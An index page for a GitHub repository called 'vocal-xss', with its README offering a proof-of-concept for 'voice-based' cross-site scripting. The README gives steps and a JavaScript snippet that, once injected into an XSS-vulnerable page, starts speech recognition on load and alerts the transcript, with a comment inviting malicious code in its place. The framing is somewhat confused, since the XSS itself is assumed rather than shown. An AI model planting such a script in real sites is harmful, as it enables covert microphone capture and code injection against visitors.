Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/blue0x1/vocal-xss
The Vocal XSS demonstrates proof-of-concept scripts for exploiting voice-based Cross-Site Scripting (XSS) in web applications.
https://github.com/blue0x1/vocal-xss
Last synced: about 2 months ago
JSON representation
The Vocal XSS demonstrates proof-of-concept scripts for exploiting voice-based Cross-Site Scripting (XSS) in web applications.
- Host: GitHub
- URL: https://github.com/blue0x1/vocal-xss
- Owner: blue0x1
- Created: 2024-05-13T03:22:13.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2024-05-13T03:39:57.000Z (8 months ago)
- Last Synced: 2024-05-13T04:36:39.559Z (8 months ago)
- Homepage:
- Size: 116 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Voice Input XSS
This proof of concept demonstrates how an attacker can exploit a Cross-Site Scripting (XSS) vulnerability using voice input. By leveraging the Web Speech API, an attacker can inject and execute malicious JavaScript code into a vulnerable web page when the user interacts with it using voice commands.
## Description
The provided script utilizes the Web Speech API to listen for voice input from the user. When the recognition detects speech, it captures the transcript and displays it in an alert dialog box. However, an attacker could modify this script to execute arbitrary JavaScript code instead of displaying the transcript.
## Proof of concept
![image](image.gif)
## Steps to Reproduce
1. Create or identify a web page vulnerable to XSS.
2. Embed the following JavaScript code into the vulnerable web page:```javascript
const recognition = new window.webkitSpeechRecognition();
recognition.lang = 'en-US';
recognition.interimResults = false;
recognition.maxAlternatives = 1;recognition.onresult = function(event) {
const transcript = event.results[0][0].transcript;
// Inject malicious code here instead of displaying the transcript
alert('Transcript: ' + transcript);
recognition.stop();
};recognition.onerror = function(event) {
console.error('Speech recognition error:', event.error);
};window.addEventListener('DOMContentLoaded', function() {
recognition.start();
});```
3. Ensure that the web page allows access to the Web Speech API.
4. Visit the web page using a browser that supports the Web Speech API (e.g., Google Chrome).
5. Interact with the web page by speaking into the microphone. The script will capture your speech and execute any injected JavaScript code.